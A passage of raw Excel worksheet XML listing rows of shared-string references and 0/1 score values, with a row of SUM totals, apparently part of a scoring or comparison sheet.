      <c r="F13" s="3" t="s">
        <v>614</v>
      </c>
      <c r="G13">
        <v>1</v>
      </c>
      <c r="H13">
        <v>1</v>
      </c>
    </row>
    <row r="14" spans="1:8" ht="55.2" x14ac:dyDescent="0.25">
      <c r="A14" s="3" t="s">
        <v>615</v>
      </c>
      <c r="B14" s="3" t="s">
        <v>616</v>
      </c>
      <c r="C14" s="3" t="s">
        <v>616</v>
      </c>
      <c r="D14">
        <v>1</v>
      </c>
      <c r="E14">
        <v>1</v>
      </c>
      <c r="F14" s="3" t="s">
        <v>616</v>
      </c>
      <c r="G14">
        <v>1</v>
      </c>
      <c r="H14">
        <v>1</v>
      </c>
    </row>
    <row r="15" spans="1:8" ht="55.2" x14ac:dyDescent="0.25">
      <c r="A15" s="3" t="s">
        <v>617</v>
      </c>
      <c r="B15" s="3" t="s">
        <v>618</v>
      </c>
      <c r="C15" s="3" t="s">
        <v>618</v>
      </c>
      <c r="D15">
        <v>1</v>
      </c>
      <c r="E15">
        <v>1</v>
      </c>
      <c r="F15" s="3" t="s">
        <v>618</v>
      </c>
      <c r="G15">
        <v>1</v>
      </c>
      <c r="H15">
        <v>1</v>
      </c>
    </row>
    <row r="16" spans="1:8" ht="55.2" x14ac:dyDescent="0.25">
      <c r="A16" s="3" t="s">
        <v>619</v>
      </c>
      <c r="B16" s="3" t="s">
        <v>620</v>
      </c>
      <c r="C16" s="3" t="s">
        <v>620</v>
      </c>
      <c r="D16">
        <v>1</v>
      </c>
      <c r="E16">
        <v>1</v>
      </c>
      <c r="F16" s="3" t="s">
        <v>620</v>
      </c>
      <c r="G16">
        <v>1</v>
      </c>
      <c r="H16">
        <v>1</v>
      </c>
    </row>
    <row r="17" spans="1:8" ht="55.2" x14ac:dyDescent="0.25">
      <c r="A17" s="3" t="s">
        <v>621</v>
      </c>
      <c r="B17" s="3" t="s">
        <v>622</v>
      </c>
      <c r="C17" s="3" t="s">
        <v>622</v>
      </c>
      <c r="D17">
        <v>1</v>
      </c>
      <c r="E17">
        <v>1</v>
      </c>
      <c r="F17" s="3" t="s">
        <v>622</v>
      </c>
      <c r="G17">
        <v>1</v>
      </c>
      <c r="H17">
        <v>1</v>
      </c>
    </row>
    <row r="18" spans="1:8" ht="55.2" x14ac:dyDescent="0.25">
      <c r="A18" s="3" t="s">
        <v>623</v>
      </c>
      <c r="B18" s="3" t="s">
        <v>624</v>
      </c>
      <c r="C18" s="3" t="s">
        <v>624</v>
      </c>
      <c r="D18">
        <v>1</v>
      </c>
      <c r="E18">
        <v>1</v>
      </c>
      <c r="F18" s="3" t="s">
        <v>624</v>
      </c>
      <c r="G18">
        <v>1</v>
      </c>
      <c r="H18">
        <v>1</v>
      </c>
    </row>
    <row r="19" spans="1:8" ht="41.4" x14ac:dyDescent="0.25">
      <c r="A19" s="3" t="s">
        <v>625</v>
      </c>
      <c r="B19" s="3" t="s">
        <v>626</v>
      </c>
      <c r="C19" s="3" t="s">
        <v>626</v>
      </c>
      <c r="D19">
        <v>1</v>
      </c>
      <c r="E19">
        <v>1</v>
      </c>
      <c r="F19" s="3" t="s">
        <v>626</v>
      </c>
      <c r="G19">
        <v>1</v>
      </c>
      <c r="H19">
        <v>1</v>
      </c>
    </row>
    <row r="20" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A20" s="3" t="s">
        <v>627</v>
      </c>
      <c r="B20" s="3" t="s">
        <v>628</v>
      </c>
      <c r="C20" s="3" t="s">
        <v>691</v>
      </c>
      <c r="D20">
        <v>1</v>
      </c>
      <c r="E20">
        <v>0</v>
      </c>
      <c r="F20" s="3" t="s">
        <v>708</v>
      </c>
      <c r="G20">
        <v>1</v>
      </c>
      <c r="H20">
        <v>0</v>
      </c>
    </row>
    <row r="21" spans="1:8" ht="41.4" x14ac:dyDescent="0.25">
      <c r="A21" s="3" t="s">
        <v>629</v>
      </c>
      <c r="B21" s="3" t="s">
        <v>433</v>
      </c>
      <c r="C21" s="3" t="s">
        <v>433</v>
      </c>
      <c r="D21">
        <v>1</v>
      </c>
      <c r="E21">
        <v>1</v>
      </c>
      <c r="F21" s="3" t="s">
        <v>433</v>
      </c>
      <c r="G21">
        <v>1</v>
      </c>
      <c r="H21">
        <v>1</v>
      </c>
    </row>
    <row r="22" spans="1:8" ht="69" x14ac:dyDescent="0.25">
      <c r="A22" s="3" t="s">
        <v>630</v>
      </c>
      <c r="B22" s="3"/>
      <c r="C22" s="3"/>
      <c r="F22" s="3"/>
    </row>
    <row r="23" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A23" s="3" t="s">
        <v>435</v>
      </c>
      <c r="B23" s="3" t="s">
        <v>436</v>
      </c>
      <c r="C23" s="3" t="s">
        <v>436</v>
      </c>
      <c r="D23">
        <v>1</v>
      </c>
      <c r="E23">
        <v>1</v>
      </c>
      <c r="F23" s="3" t="s">
        <v>436</v>
      </c>
      <c r="G23">
        <v>1</v>
      </c>
      <c r="H23">
        <v>1</v>
      </c>
    </row>
    <row r="24" spans="1:8" ht="41.4" x14ac:dyDescent="0.25">
      <c r="A24" s="3" t="s">
        <v>631</v>
      </c>
      <c r="B24" s="3" t="s">
        <v>632</v>
      </c>
      <c r="C24" s="3" t="s">
        <v>632</v>
      </c>
      <c r="D24">
        <v>1</v>
      </c>
      <c r="E24">
        <v>1</v>
      </c>
      <c r="F24" s="3" t="s">
        <v>632</v>
      </c>
      <c r="G24">
        <v>1</v>
      </c>
      <c r="H24">
        <v>1</v>
      </c>
    </row>
    <row r="25" spans="1:8" ht="41.4" x14ac:dyDescent="0.25">
      <c r="A25" s="3" t="s">
        <v>633</v>
      </c>
      <c r="B25" s="3" t="s">
        <v>634</v>
      </c>
      <c r="C25" s="3" t="s">
        <v>692</v>
      </c>
      <c r="D25">
        <v>0</v>
      </c>
      <c r="E25">
        <v>0</v>
      </c>
      <c r="F25" s="3" t="s">
        <v>709</v>
      </c>
      <c r="G25">
        <v>0</v>
      </c>
      <c r="H25">
        <v>0</v>
      </c>
    </row>
    <row r="26" spans="1:8" ht="82.8" x14ac:dyDescent="0.25">
      <c r="A26" s="3" t="s">
        <v>635</v>
      </c>
      <c r="B26" s="3" t="s">
        <v>636</v>
      </c>
      <c r="C26" s="3" t="s">
        <v>693</v>
      </c>
      <c r="D26">
        <v>0</v>
      </c>
      <c r="E26">
        <v>0</v>
      </c>
      <c r="F26" s="3" t="s">
        <v>710</v>
      </c>
      <c r="G26">
        <v>1</v>
      </c>
      <c r="H26">
        <v>0</v>
      </c>
    </row>
    <row r="27" spans="1:8" ht="41.4" x14ac:dyDescent="0.25">
      <c r="A27" s="3" t="s">
        <v>637</v>
      </c>
      <c r="B27" s="3" t="s">
        <v>638</v>
      </c>
      <c r="C27" s="3" t="s">
        <v>694</v>
      </c>
      <c r="D27">
        <v>1</v>
      </c>
      <c r="E27">
        <v>1</v>
      </c>
      <c r="F27" s="3" t="s">
        <v>638</v>
      </c>
      <c r="G27">
        <v>1</v>
      </c>
      <c r="H27">
        <v>1</v>
      </c>
    </row>
    <row r="28" spans="1:8" ht="41.4" x14ac:dyDescent="0.25">
      <c r="A28" s="3" t="s">
        <v>639</v>
      </c>
      <c r="B28" s="3" t="s">
        <v>640</v>
      </c>
      <c r="C28" s="3" t="s">
        <v>695</v>
      </c>
      <c r="D28">
        <v>1</v>
      </c>
      <c r="E28">
        <v>1</v>
      </c>
      <c r="F28" s="3" t="s">
        <v>695</v>
      </c>
      <c r="G28">
        <v>1</v>
      </c>
      <c r="H28">
        <v>1</v>
      </c>
    </row>
    <row r="29" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A29" s="3" t="s">
        <v>641</v>
      </c>
      <c r="B29" s="3" t="s">
        <v>114</v>
      </c>
      <c r="C29" s="3" t="s">
        <v>114</v>
      </c>
      <c r="D29">
        <v>1</v>
      </c>
      <c r="E29">
        <v>1</v>
      </c>
      <c r="F29" s="3" t="s">
        <v>711</v>
      </c>
      <c r="G29">
        <v>1</v>
      </c>
      <c r="H29">
        <v>0</v>
      </c>
    </row>
    <row r="30" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A30" s="3" t="s">
        <v>642</v>
      </c>
      <c r="B30" s="3" t="s">
        <v>643</v>
      </c>
      <c r="C30" s="3" t="s">
        <v>643</v>
      </c>
      <c r="D30">
        <v>1</v>
      </c>
      <c r="E30">
        <v>1</v>
      </c>
      <c r="F30" s="3" t="s">
        <v>643</v>
      </c>
      <c r="G30">
        <v>1</v>
      </c>
      <c r="H30">
        <v>1</v>
      </c>
    </row>
    <row r="31" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A31" s="3" t="s">
        <v>644</v>
      </c>
      <c r="B31" s="3" t="s">
        <v>645</v>
      </c>
      <c r="C31" s="3" t="s">
        <v>645</v>
      </c>
      <c r="D31">
        <v>1</v>
      </c>
      <c r="E31">
        <v>1</v>
      </c>
      <c r="F31" s="3" t="s">
        <v>645</v>
      </c>
      <c r="G31">
        <v>1</v>
      </c>
      <c r="H31">
        <v>1</v>
      </c>
    </row>
    <row r="32" spans="1:8" ht="69" x14ac:dyDescent="0.25">
      <c r="A32" s="3" t="s">
        <v>646</v>
      </c>
      <c r="B32" s="3"/>
      <c r="C32" s="3"/>
      <c r="F32" s="3"/>
    </row>
    <row r="33" spans="1:8" ht="55.2" x14ac:dyDescent="0.25">
      <c r="A33" s="3" t="s">
        <v>647</v>
      </c>
      <c r="B33" s="3" t="s">
        <v>648</v>
      </c>
      <c r="C33" s="3" t="s">
        <v>696</v>
      </c>
      <c r="D33">
        <v>1</v>
      </c>
      <c r="E33">
        <v>1</v>
      </c>
      <c r="F33" s="3" t="s">
        <v>648</v>
      </c>
      <c r="G33">
        <v>1</v>
      </c>
      <c r="H33">
        <v>1</v>
      </c>
    </row>
    <row r="34" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A34" s="3" t="s">
        <v>649</v>
      </c>
      <c r="B34" s="3" t="s">
        <v>650</v>
      </c>
      <c r="C34" s="3" t="s">
        <v>697</v>
      </c>
      <c r="D34">
        <v>1</v>
      </c>
      <c r="E34">
        <v>0</v>
      </c>
      <c r="F34" s="3" t="s">
        <v>650</v>
      </c>
      <c r="G34">
        <v>1</v>
      </c>
      <c r="H34">
        <v>1</v>
      </c>
    </row>
    <row r="35" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A35" s="3" t="s">
        <v>651</v>
      </c>
      <c r="B35" s="3" t="s">
        <v>652</v>
      </c>
      <c r="C35" s="3" t="s">
        <v>698</v>
      </c>
      <c r="D35">
        <v>1</v>
      </c>
      <c r="E35">
        <v>0</v>
      </c>
      <c r="F35" s="3" t="s">
        <v>698</v>
      </c>
      <c r="G35">
        <v>1</v>
      </c>
      <c r="H35">
        <v>0</v>
      </c>
    </row>
    <row r="36" spans="1:8" ht="69" x14ac:dyDescent="0.25">
      <c r="A36" s="3" t="s">
        <v>653</v>
      </c>
      <c r="B36" s="3" t="s">
        <v>654</v>
      </c>
      <c r="C36" s="3" t="s">
        <v>699</v>
      </c>
      <c r="D36">
        <v>1</v>
      </c>
      <c r="E36">
        <v>1</v>
      </c>
      <c r="F36" s="3" t="s">
        <v>654</v>
      </c>
      <c r="G36">
        <v>1</v>
      </c>
      <c r="H36">
        <v>1</v>
      </c>
    </row>
    <row r="37" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A37" s="3" t="s">
        <v>655</v>
      </c>
      <c r="B37" s="3" t="s">
        <v>656</v>
      </c>
      <c r="C37" s="3" t="s">
        <v>700</v>
      </c>
      <c r="D37">
        <v>0</v>
      </c>
      <c r="E37">
        <v>0</v>
      </c>
      <c r="F37" s="3" t="s">
        <v>656</v>
      </c>
      <c r="G37">
        <v>1</v>
      </c>
      <c r="H37">
        <v>1</v>
      </c>
    </row>
    <row r="38" spans="1:8" ht="41.4" x14ac:dyDescent="0.25">
      <c r="A38" s="3" t="s">
        <v>657</v>
      </c>
      <c r="B38" s="3" t="s">
        <v>658</v>
      </c>
      <c r="C38" s="3" t="s">
        <v>701</v>
      </c>
      <c r="D38">
        <v>0</v>
      </c>
      <c r="E38">
        <v>0</v>
      </c>
      <c r="F38" s="3" t="s">
        <v>712</v>
      </c>
      <c r="G38">
        <v>1</v>
      </c>
      <c r="H38">
        <v>1</v>
      </c>
    </row>
    <row r="39" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A39" s="3" t="s">
        <v>659</v>
      </c>
      <c r="B39" s="3" t="s">
        <v>660</v>
      </c>
      <c r="C39" s="3" t="s">
        <v>702</v>
      </c>
      <c r="D39">
        <v>1</v>
      </c>
      <c r="E39">
        <v>1</v>
      </c>
      <c r="F39" s="3" t="s">
        <v>660</v>
      </c>
      <c r="G39">
        <v>1</v>
      </c>
      <c r="H39">
        <v>1</v>
      </c>
    </row>
    <row r="40" spans="1:8" ht="151.80000000000001" x14ac:dyDescent="0.25">
      <c r="A40" s="3" t="s">
        <v>661</v>
      </c>
      <c r="B40" s="3" t="s">
        <v>662</v>
      </c>
      <c r="C40" s="3" t="s">
        <v>703</v>
      </c>
      <c r="D40">
        <v>1</v>
      </c>
      <c r="E40">
        <v>0</v>
      </c>
      <c r="F40" s="3" t="s">
        <v>713</v>
      </c>
      <c r="G40">
        <v>0</v>
      </c>
      <c r="H40">
        <v>0</v>
      </c>
    </row>
    <row r="41" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A41" s="3" t="s">
        <v>663</v>
      </c>
      <c r="B41" s="3" t="s">
        <v>664</v>
      </c>
      <c r="C41" s="3" t="s">
        <v>664</v>
      </c>
      <c r="D41" s="20">
        <v>1</v>
      </c>
      <c r="E41" s="20">
        <v>1</v>
      </c>
      <c r="F41" s="3" t="s">
        <v>664</v>
      </c>
      <c r="G41">
        <v>1</v>
      </c>
      <c r="H41">
        <v>1</v>
      </c>
    </row>
    <row r="42" spans="1:8" ht="41.4" x14ac:dyDescent="0.25">
      <c r="A42" s="3" t="s">
        <v>665</v>
      </c>
      <c r="B42" s="3" t="s">
        <v>666</v>
      </c>
      <c r="C42" s="3" t="s">
        <v>666</v>
      </c>
      <c r="D42" s="20">
        <v>1</v>
      </c>
      <c r="E42" s="20">
        <v>1</v>
      </c>
      <c r="F42" s="3" t="s">
        <v>666</v>
      </c>
      <c r="G42">
        <v>1</v>
      </c>
      <c r="H42">
        <v>1</v>
      </c>
    </row>
    <row r="43" spans="1:8" ht="55.2" x14ac:dyDescent="0.25">
      <c r="A43" s="3" t="s">
        <v>667</v>
      </c>
      <c r="B43" s="3" t="s">
        <v>668</v>
      </c>
      <c r="C43" s="3" t="s">
        <v>668</v>
      </c>
      <c r="D43" s="20">
        <v>1</v>
      </c>
      <c r="E43" s="20">
        <v>1</v>
      </c>
      <c r="F43" s="3" t="s">
        <v>668</v>
      </c>
      <c r="G43">
        <v>1</v>
      </c>
      <c r="H43">
        <v>1</v>
      </c>
    </row>
    <row r="44" spans="1:8" ht="55.2" x14ac:dyDescent="0.25">
      <c r="A44" s="3" t="s">
        <v>669</v>
      </c>
      <c r="B44" s="3" t="s">
        <v>670</v>
      </c>
      <c r="C44" s="3" t="s">
        <v>670</v>
      </c>
      <c r="D44" s="20">
        <v>1</v>
      </c>
      <c r="E44" s="20">
        <v>1</v>
      </c>
      <c r="F44" s="3" t="s">
        <v>670</v>
      </c>
      <c r="G44">
        <v>1</v>
      </c>
      <c r="H44">
        <v>1</v>
      </c>
    </row>
    <row r="45" spans="1:8" ht="55.2" x14ac:dyDescent="0.25">
      <c r="A45" s="3" t="s">
        <v>671</v>
      </c>
      <c r="B45" s="3" t="s">
        <v>672</v>
      </c>
      <c r="C45" s="3" t="s">
        <v>672</v>
      </c>
      <c r="D45" s="20">
        <v>1</v>
      </c>
      <c r="E45" s="20">
        <v>1</v>
      </c>
      <c r="F45" s="3" t="s">
        <v>672</v>
      </c>
      <c r="G45">
        <v>1</v>
      </c>
      <c r="H45">
        <v>1</v>
      </c>
    </row>
    <row r="46" spans="1:8" ht="55.2" x14ac:dyDescent="0.25">
      <c r="A46" s="3" t="s">
        <v>673</v>
      </c>
      <c r="B46" s="3" t="s">
        <v>674</v>
      </c>
      <c r="C46" s="3" t="s">
        <v>674</v>
      </c>
      <c r="D46" s="20">
        <v>1</v>
      </c>
      <c r="E46" s="20">
        <v>1</v>
      </c>
      <c r="F46" s="3" t="s">
        <v>674</v>
      </c>
      <c r="G46">
        <v>1</v>
      </c>
      <c r="H46">
        <v>1</v>
      </c>
    </row>
    <row r="47" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A47" s="3" t="s">
        <v>675</v>
      </c>
      <c r="B47" s="3" t="s">
        <v>676</v>
      </c>
      <c r="C47" s="3" t="s">
        <v>676</v>
      </c>
      <c r="D47" s="20">
        <v>1</v>
      </c>
      <c r="E47" s="20">
        <v>1</v>
      </c>
      <c r="F47" s="3" t="s">
        <v>676</v>
      </c>
      <c r="G47">
        <v>1</v>
      </c>
      <c r="H47">
        <v>1</v>
      </c>
    </row>
    <row r="48" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A48" s="3" t="s">
        <v>675</v>
      </c>
      <c r="B48" s="3" t="s">
        <v>676</v>
      </c>
      <c r="C48" s="3" t="s">
        <v>676</v>
      </c>
      <c r="D48" s="20">
        <v>1</v>
      </c>
      <c r="E48" s="20">
        <v>1</v>
      </c>
      <c r="F48" s="3" t="s">
        <v>676</v>
      </c>
      <c r="G48">
        <v>1</v>
      </c>
      <c r="H48">
        <v>1</v>
      </c>
    </row>
    <row r="49" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A49" s="3" t="s">
        <v>677</v>
      </c>
      <c r="B49" s="3" t="s">
        <v>678</v>
      </c>
      <c r="C49" s="3" t="s">
        <v>678</v>
      </c>
      <c r="D49" s="20">
        <v>1</v>
      </c>
      <c r="E49" s="20">
        <v>1</v>
      </c>
      <c r="F49" s="3" t="s">
        <v>678</v>
      </c>
      <c r="G49">
        <v>1</v>
      </c>
      <c r="H49">
        <v>1</v>
      </c>
    </row>
    <row r="50" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A50" s="3" t="s">
        <v>677</v>
      </c>
      <c r="B50" s="3" t="s">
        <v>678</v>
      </c>
      <c r="C50" s="3" t="s">
        <v>678</v>
      </c>
      <c r="D50" s="20">
        <v>1</v>
      </c>
      <c r="E50" s="20">
        <v>1</v>
      </c>
      <c r="F50" s="3" t="s">
        <v>678</v>
      </c>
      <c r="G50">
        <v>1</v>
      </c>
      <c r="H50">
        <v>1</v>
      </c>
    </row>
    <row r="51" spans="1:8" ht="124.2" x14ac:dyDescent="0.25">
      <c r="A51" s="3" t="s">
        <v>679</v>
      </c>
      <c r="B51" s="3" t="s">
        <v>680</v>
      </c>
      <c r="C51" s="3" t="s">
        <v>704</v>
      </c>
      <c r="D51">
        <v>0</v>
      </c>
      <c r="E51">
        <v>0</v>
      </c>
      <c r="F51" s="3" t="s">
        <v>714</v>
      </c>
      <c r="G51">
        <v>0</v>
      </c>
      <c r="H51">
        <v>0</v>
      </c>
    </row>
    <row r="52" spans="1:8" ht="69" x14ac:dyDescent="0.25">
      <c r="A52" s="3" t="s">
        <v>681</v>
      </c>
      <c r="B52" s="3" t="s">
        <v>682</v>
      </c>
      <c r="C52" s="3" t="s">
        <v>705</v>
      </c>
      <c r="D52">
        <v>1</v>
      </c>
      <c r="E52">
        <v>1</v>
      </c>
      <c r="F52" s="3" t="s">
        <v>705</v>
      </c>
      <c r="G52">
        <v>1</v>
      </c>
      <c r="H52">
        <v>1</v>
      </c>
    </row>
    <row r="53" spans="1:8" ht="69" x14ac:dyDescent="0.25">
      <c r="A53" s="3" t="s">
        <v>683</v>
      </c>
      <c r="B53" s="3" t="s">
        <v>684</v>
      </c>
      <c r="C53" s="3" t="s">
        <v>706</v>
      </c>
      <c r="D53">
        <v>1</v>
      </c>
      <c r="E53">
        <v>1</v>
      </c>
      <c r="F53" s="3" t="s">
        <v>706</v>
      </c>
      <c r="G53">
        <v>1</v>
      </c>
      <c r="H53">
        <v>1</v>
      </c>
    </row>
    <row r="54" spans="1:8" ht="82.8" x14ac:dyDescent="0.25">
      <c r="A54" s="3" t="s">
        <v>685</v>
      </c>
      <c r="B54" s="3" t="s">
        <v>686</v>
      </c>
      <c r="C54" s="3" t="s">
        <v>707</v>
      </c>
      <c r="D54">
        <v>1</v>
      </c>
      <c r="E54">
        <v>1</v>
      </c>
      <c r="F54" s="3" t="s">
        <v>715</v>
      </c>
      <c r="G54">
        <v>1</v>
      </c>
      <c r="H54">
        <v>1</v>
      </c>
    </row>
    <row r="55" spans="1:8" ht="69" x14ac:dyDescent="0.25">
      <c r="A55" s="3" t="s">
        <v>687</v>
      </c>
      <c r="B55" s="3"/>
      <c r="C55" s="3"/>
      <c r="F55" s="3"/>
    </row>
    <row r="56" spans="1:8" ht="69" x14ac:dyDescent="0.25">
      <c r="A56" s="3" t="s">
        <v>688</v>
      </c>
      <c r="B56" s="3"/>
      <c r="C56" s="3"/>
      <c r="F56" s="3"/>
    </row>
    <row r="57" spans="1:8" ht="69" x14ac:dyDescent="0.25">
      <c r="A57" s="3" t="s">
        <v>689</v>
      </c>
      <c r="B57" s="3"/>
      <c r="C57" s="3"/>
      <c r="F57" s="3"/>
    </row>
    <row r="58" spans="1:8" ht="110.4" x14ac:dyDescent="0.25">
      <c r="A58" s="3" t="s">
        <v>690</v>
      </c>
      <c r="B58" s="3"/>
      <c r="C58" s="3"/>
      <c r="F58" s="3"/>
    </row>
    <row r="59" spans="1:8" s="6" customFormat="1" ht="17.399999999999999" x14ac:dyDescent="0.3">
      <c r="A59" s="18" t="s">
        <v>41</v>
      </c>
      <c r="D59" s="6">
        <f>SUM(D4:D54)</f>
        <v>44</v>
      </c>
      <c r="E59" s="6">
        <f t="shared" ref="E59:H59" si="0">SUM(E4:E54)</f>
        <v>40</v>
      </c>
      <c r="F59" s="6">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="G59" s="6">
        <f t="shared" si="0"/>
        <v>46</v>
      </c>
      <c r="H59" s="6">
        <f t="shared" si="0"/>
        <v>42</v>
      </c>
    </row>
    <row r="62" spans="1:8" ht="25.2" x14ac:dyDescent="0.45">
      <c r="A62" s="25" t="s">
        <v>44</v>
      </c>
      <c r="B62" s="25"/>
      <c r="C62" s="25"/>
      <c r="D62" s="25"/>
      <c r="E62" s="25"/>
      <c r="F62" s="25"/>
      <c r="G62" s="25"/>
      <c r="H62" s="25"/>
    </row>
    <row r="63" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A63" s="4" t="s">
        <v>1</v>
      </c>
      <c r="B63" s="4" t="s">
        <v>2</v>
      </c>
      <c r="C63" s="4" t="s">
        <v>3</v>
      </c>
      <c r="D63" s="4" t="s">
        <v>5</v>
      </c>
      <c r="E63" s="4" t="s">
        <v>6</v>
      </c>
      <c r="F63" s="4" t="s">
        <v>4</v>
      </c>
      <c r="G63" s="4" t="s">
        <v>5</v>
      </c>
      <c r="H63" s="4" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="64" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A64" s="3" t="s">
        <v>45</v>
      </c>
      <c r="B64" s="3" t="s">
        <v>56</v>
      </c>
      <c r="C64" s="3" t="s">
        <v>45</v>
      </c>
      <c r="D64" s="20">
        <v>1</v>
      </c>
      <c r="E64" s="20">
        <v>1</v>
      </c>
      <c r="F64" s="3" t="s">
        <v>45</v>
      </c>
      <c r="G64">
        <v>1</v>
      </c>
      <c r="H64">
        <v>1</v>
      </c>
    </row>
    <row r="65" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A65" s="3" t="s">
        <v>46</v>
      </c>
      <c r="B65" s="3" t="s">
        <v>57</v>
      </c>
      <c r="C65" s="3" t="s">
        <v>57</v>
      </c>
      <c r="D65" s="20">
        <v>1</v>
      </c>
      <c r="E65" s="20">
        <v>1</v>
      </c>
      <c r="F65" s="3" t="s">
        <v>57</v>
      </c>
      <c r="G65">
        <v>1</v>
      </c>
      <c r="H65">
        <v>1</v>
      </c>
    </row>
    <row r="66" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A66" s="3" t="s">
        <v>1591</v>
      </c>
      <c r="B66" s="3" t="s">
        <v>1335</v>
      </c>
      <c r="C66" s="3" t="s">
        <v>1614</v>
      </c>
      <c r="D66" s="20">
        <v>1</v>
      </c>
      <c r="E66" s="20">
        <v>0</v>
      </c>
      <c r="F66" s="3" t="s">
        <v>1614</v>
      </c>
      <c r="G66">
        <v>1</v>
      </c>
      <c r="H66">
        <v>0</v>
      </c>
    </row>
    <row r="67" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A67" s="3" t="s">
        <v>1628</v>
      </c>
      <c r="B67" s="3" t="s">
        <v>1373</v>
      </c>
      <c r="C67" s="3" t="s">
        <v>1917</v>
      </c>
      <c r="D67" s="20">
        <v>0</v>
      </c>
      <c r="E67" s="20">
        <v>0</v>
      </c>
      <c r="F67" s="3" t="s">
        <v>1669</v>
      </c>
      <c r="G67">
        <v>1</v>
      </c>
      <c r="H67">
        <v>0</v>
      </c>
    </row>
    <row r="68" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A68" s="3" t="s">
        <v>1271</v>
      </c>
      <c r="B68" s="3" t="s">
        <v>60</v>
      </c>
      <c r="C68" s="3" t="s">
        <v>1074</v>
      </c>
      <c r="D68" s="20">
        <v>1</v>
      </c>
      <c r="E68" s="20">
        <v>1</v>
      </c>
      <c r="F68" s="3" t="s">
        <v>1074</v>
      </c>
      <c r="G68">
        <v>1</v>
      </c>
      <c r="H68">
        <v>1</v>
      </c>
    </row>
    <row r="69" spans="1:8" s="19" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A69" s="3"/>
      <c r="B69" s="3" t="s">
        <v>1587</v>
      </c>
      <c r="C69" s="3" t="s">
        <v>1587</v>
      </c>
      <c r="D69" s="20">
        <v>1</v>
      </c>
      <c r="E69" s="20">
        <v>1</v>
      </c>
      <c r="F69" s="3" t="s">
        <v>1587</v>
      </c>
      <c r="G69" s="19">
        <v>1</v>
      </c>
      <c r="H69" s="19">
        <v>1</v>
      </c>
    </row>
    <row r="70" spans="1:8" s="19" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A70" s="3"/>
      <c r="B70" s="3" t="s">
        <v>1063</v>
      </c>
      <c r="C70" s="3" t="s">
        <v>1063</v>
      </c>
      <c r="D70" s="20">
        <v>1</v>
      </c>
      <c r="E70" s="20">
        <v>1</v>
      </c>
      <c r="F70" s="3" t="s">
        <v>1063</v>
      </c>
      <c r="G70" s="19">
        <v>1</v>
      </c>
      <c r="H70" s="19">
        <v>1</v>
      </c>
    </row>
    <row r="71" spans="1:8" s="19" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A71" s="3"/>
      <c r="B71" s="3" t="s">
        <v>63</v>
      </c>
      <c r="C71" s="3" t="s">
        <v>63</v>
      </c>
      <c r="D71" s="20">
        <v>1</v>
      </c>
      <c r="E71" s="20">
        <v>1</v>
      </c>
      <c r="F71" s="3" t="s">
        <v>63</v>
      </c>
      <c r="G71" s="19">
        <v>1</v>
      </c>
      <c r="H71" s="19">
        <v>1</v>
      </c>
    </row>
    <row r="72" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A72" s="3" t="s">
        <v>1629</v>
      </c>
      <c r="B72" s="3" t="s">
        <v>1457</v>
      </c>
      <c r="C72" s="3" t="s">
        <v>1457</v>
      </c>
      <c r="D72" s="20">
        <v>1</v>
      </c>
      <c r="E72" s="20">
        <v>1</v>
      </c>
      <c r="F72" s="3" t="s">
        <v>1457</v>
      </c>
      <c r="G72">
        <v>1</v>
      </c>
      <c r="H72">
        <v>1</v>
      </c>
    </row>
    <row r="73" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A73" s="3" t="s">
        <v>1630</v>
      </c>
      <c r="B73" s="3" t="s">
        <v>62</v>
      </c>
      <c r="C73" s="3" t="s">
        <v>62</v>
      </c>
      <c r="D73" s="20">
        <v>1</v>
      </c>
      <c r="E73" s="20">
        <v>1</v>
      </c>
      <c r="F73" s="3" t="s">
        <v>62</v>
      </c>
      <c r="G73">
        <v>1</v>
      </c>
      <c r="H73">
        <v>1</v>
      </c>
    </row>
    <row r="74" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A74" s="3" t="s">
        <v>1631</v>
      </c>
      <c r="B74" s="3" t="s">
        <v>1632</v>
      </c>
      <c r="C74" s="3" t="s">
        <v>1670</v>
      </c>
      <c r="D74" s="20">
        <v>1</v>
      </c>
      <c r="E74" s="20">
        <v>1</v>
      </c>
      <c r="F74" s="3" t="s">
        <v>1670</v>
      </c>
      <c r="G74">
        <v>1</v>
      </c>
      <c r="H74">
        <v>1</v>
      </c>
    </row>
    <row r="75" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A75" s="3" t="s">
        <v>1633</v>
      </c>
      <c r="B75" s="3" t="s">
        <v>1634</v>
      </c>
      <c r="C75" s="3" t="s">
        <v>1671</v>
      </c>
      <c r="D75" s="20">
        <v>1</v>
      </c>
      <c r="E75" s="20">
        <v>0</v>
      </c>
      <c r="F75" s="3" t="s">
        <v>1671</v>
      </c>
      <c r="G75">
        <v>1</v>
      </c>
      <c r="H75">
        <v>0</v>
      </c>
    </row>
    <row r="76" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A76" s="3" t="s">
        <v>1633</v>
      </c>
      <c r="B76" s="3" t="s">
        <v>1634</v>
      </c>
      <c r="C76" s="3" t="s">
        <v>1671</v>
      </c>
      <c r="D76" s="20">
